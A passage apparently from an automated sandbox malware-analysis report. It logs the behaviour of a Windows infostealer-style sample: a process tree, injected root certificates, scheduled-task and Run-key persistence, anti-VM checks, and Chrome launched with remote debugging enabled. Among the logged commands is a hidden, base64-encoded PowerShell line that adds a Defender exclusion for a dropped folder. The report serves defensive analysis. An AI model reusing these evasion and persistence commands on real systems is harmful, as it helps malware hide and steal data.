d911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mdjw5me.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	6471db0115.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	6471db0115.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1684	PING.EXE
1752	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2964	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2568	chrome.exe
2568	chrome.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
1888	chrome.exe
1888	chrome.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
1776	JKECGDBFCB.exe
2904	skotes.exe
1284	SdVB3P2.exe
2228	powershell.exe
1424	DJj.exe
1424	DJj.exe
1424	DJj.exe
1424	DJj.exe
1424	DJj.exe
1424	DJj.exe
1424	DJj.exe
2552	powershell.exe
1896	DJj.exe
1896	DJj.exe
1896	DJj.exe
1896	DJj.exe
1896	DJj.exe
1896	DJj.exe
1896	DJj.exe
2348	141fa64e9f.exe
2348	141fa64e9f.exe
2348	141fa64e9f.exe
2348	141fa64e9f.exe
2348	141fa64e9f.exe
2348	141fa64e9f.exe
1700	e50c478749.exe
1648	powershell.exe
2840	01664839d8.exe
532	9694da05e8.exe
2420	9829a32afc.exe
1940	Intel_PTT_EK_Recertification.exe
2560	e724933356.exe
764	powershell.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
1448	31fbbc958b.exe
1448	31fbbc958b.exe
1448	31fbbc958b.exe
1448	31fbbc958b.exe
1448	31fbbc958b.exe
3748	6471db0115.exe
3748	6471db0115.exe
3748	6471db0115.exe
3748	6471db0115.exe
3748	6471db0115.exe
3748	6471db0115.exe
2564	graph.exe
2564	graph.exe
2564	graph.exe
2564	graph.exe
2564	graph.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	2568	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeShutdownPrivilege	1888	chrome.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	1424	DJj.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	1896	DJj.exe
Token: SeRestorePrivilege	1540	7z.exe
Token: 35	1540	7z.exe
Token: SeSecurityPrivilege	1540	7z.exe
Token: SeSecurityPrivilege	1540	7z.exe
Token: SeRestorePrivilege	2896	7z.exe
Token: 35	2896	7z.exe
Token: SeSecurityPrivilege	2896	7z.exe
Token: SeSecurityPrivilege	2896	7z.exe
Token: SeRestorePrivilege	1800	7z.exe
Token: 35	1800	7z.exe
Token: SeSecurityPrivilege	1800	7z.exe
Token: SeSecurityPrivilege	1800	7z.exe
Token: SeRestorePrivilege	2344	7z.exe
Token: 35	2344	7z.exe
Token: SeSecurityPrivilege	2344	7z.exe
Token: SeSecurityPrivilege	2344	7z.exe
Token: SeRestorePrivilege	3012	7z.exe
Token: 35	3012	7z.exe
Token: SeSecurityPrivilege	3012	7z.exe
Token: SeSecurityPrivilege	3012	7z.exe
Token: SeRestorePrivilege	2680	7z.exe
Token: 35	2680	7z.exe
Token: SeSecurityPrivilege	2680	7z.exe
Token: SeSecurityPrivilege	2680	7z.exe
Token: SeRestorePrivilege	3044	7z.exe
Token: 35	3044	7z.exe
Token: SeSecurityPrivilege	3044	7z.exe
Token: SeSecurityPrivilege	3044	7z.exe
Token: SeRestorePrivilege	1084	7z.exe
Token: 35	1084	7z.exe
Token: SeSecurityPrivilege	1084	7z.exe
Token: SeSecurityPrivilege	1084	7z.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeLockMemoryPrivilege	1648	explorer.exe
Token: SeDebugPrivilege	896	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe

Suspicious use of FindShellTrayWindow 18 IoCs

pid	Process
2568	chrome.exe
1888	chrome.exe
1776	JKECGDBFCB.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
824	firefox.exe
824	firefox.exe
824	firefox.exe
824	firefox.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
824	firefox.exe
824	firefox.exe
824	firefox.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe
2644	11efca6d7c.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2568	2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe	32
PID 2336 wrote to memory of 2568	2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe	32
PID 2336 wrote to memory of 2568	2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe	32
PID 2336 wrote to memory of 2568	2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe	32
PID 2568 wrote to memory of 2736	2568	chrome.exe	33
PID 2568 wrote to memory of 2736	2568	chrome.exe	33
PID 2568 wrote to memory of 2736	2568	chrome.exe	33
PID 2568 wrote to memory of 2988	2568	chrome.exe	34
PID 2568 wrote to memory of 2988	2568	chrome.exe	34
PID 2568 wrote to memory of 2988	2568	chrome.exe	34
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1100	2568	chrome.exe	36
PID 2568 wrote to memory of 1520	2568	chrome.exe	37
PID 2568 wrote to memory of 1520	2568	chrome.exe	37
PID 2568 wrote to memory of 1520	2568	chrome.exe	37
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38
PID 2568 wrote to memory of 1644	2568	chrome.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

Hidden Files and Directories

T1564.001

pid	Process
2812	attrib.exe
1248	attrib.exe
2528	attrib.exe

C:\Users\Admin\AppData\Local\Temp\55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
"C:\Users\Admin\AppData\Local\Temp\55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7959758,0x7fef7959768,0x7fef7959778
    3⤵
    PID:2736
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:2988
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:2
    3⤵
    PID:1100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:8
    3⤵
    PID:1520
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:8
    3⤵
    PID:1644
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2112 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2332 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2340 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1648
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1652 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:2
    3⤵
    PID:1464
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4144 --field-trial-handle=1360,i,5139866182380416329,4303300661814542747,131072 /prefetch:8
    3⤵
    PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1888
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ed9758,0x7fef6ed9768,0x7fef6ed9778
    3⤵
    PID:1412
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:1284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:2
    3⤵
    PID:1072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:8
    3⤵
    PID:2288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:8
    3⤵
    PID:876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2364 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2704 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2980
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2812 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1396 --field-trial-handle=1276,i,4735478497199604165,1033617406791892515,131072 /prefetch:2
    3⤵
    PID:2352
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\JKECGDBFCB.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2808
- - C:\Users\Admin\Documents\JKECGDBFCB.exe
    "C:\Users\Admin\Documents\JKECGDBFCB.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\1020416001\SdVB3P2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1020416001\SdVB3P2.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:1284
    - - C:\Users\Admin\AppData\Local\Temp\1020826001\I0XmI2t.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1020826001\I0XmI2t.exe"
        5⤵
        Executes dropped EXE
        
        PID:1076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABzAHEAdAB4AHQANQBjAGQAMABnAHAATgBWAEoAWABVAEUAVQBJACcA
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
      - C:\Users\Admin\AppData\Roaming\sqtxt5cd0gpNVJXUEUI\DJj.exe
        
        "C:\Users\Admin\AppData\Roaming\sqtxt5cd0gpNVJXUEUI\DJj.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1424
    - - C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2840
      - C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:1436
    - - C:\Users\Admin\AppData\Local\Temp\1021351001\1c6afb9fad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021351001\1c6afb9fad.exe"
        5⤵
        Executes dropped EXE
        
        PID:1308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
